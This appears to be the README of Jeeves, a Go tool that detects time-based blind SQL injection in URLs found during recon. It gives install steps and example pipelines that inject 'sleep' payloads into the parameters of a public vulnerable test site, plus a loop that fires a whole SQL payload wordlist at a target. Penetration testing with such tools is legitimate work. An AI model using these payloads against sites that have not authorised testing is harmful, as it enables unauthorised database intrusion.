Jeeves: looking to Time-Based Blind SQLInjection through recon
Jeeves
Jeeves is made for looking to Time-Based Blind SQLInjection through recon.
Install
> go install github.com/ferreiraklet/Jeeves@latest
OR
> git clone https://github.com/ferreiraklet/Jeeves.git
> cd Jeeves
> go build jeeves.go
> chmod +x jeeves
./jeeves -h
Usage & Explanation:
-
In Your recon process, you may find endpoints that can be vulnerable to sql injection,
- Ex: https://redacted.com/index.php?id=1
Jeeves reads from stdin:
echo ‘https://redacted.com/index.php?id=your_time_based_blind_payload_here’ | jeeves –payload-time time_payload
In –payload-time you must use the time mentioned in the payload.
You can use a file containing a list of targets as well:
cat targets | jeeves –payload-time 5
-
You are able to use Jeeves with other tools, such as gau, gauplus, waybackurls, qsreplace and bhedak, mastering his strength
-
Another example of usage:
Usage:
–payload-time, The time from payload
–proxy Send traffic to a proxy
-H, –headers Custom Headers
-h Show This Help Message
Ex 1 – echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5
Ex 2 – echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(10)))v)” | jeeves –payload-time 10
Ex 3 – echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://179.67.16.10:8081”
Ex 4 – echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy “http://179.67.16.10:8081” -H “User-Agent: xxxx”
You can specify more than one header, OBS: Be careful, the syntax must be exact the same, Ex:
Ex 5 – echo “http://testphp.vulnweb.com/artists.php?artist=” | qsreplace “(select(0)from(select(sleep(5)))v)” | jeeves –payload-time 5 –proxy -H “Testing: testing;OtherHeader: Value;Other2: Value”
TIP:
Using with sql payloads wordlist cat sql_wordlist.txt | while read payload;do echo http://testphp.vulnweb.com/artists.php?artist= | qsreplace $payload | jeeves –payload-time 5;done
Warn: Does not follow redirects, If the Status Code is different than 200, it returns “Need Manual Analysis”
-
Copyright (c) 2022 ferreiraklet
Source: https://github.com/ferreiraklet/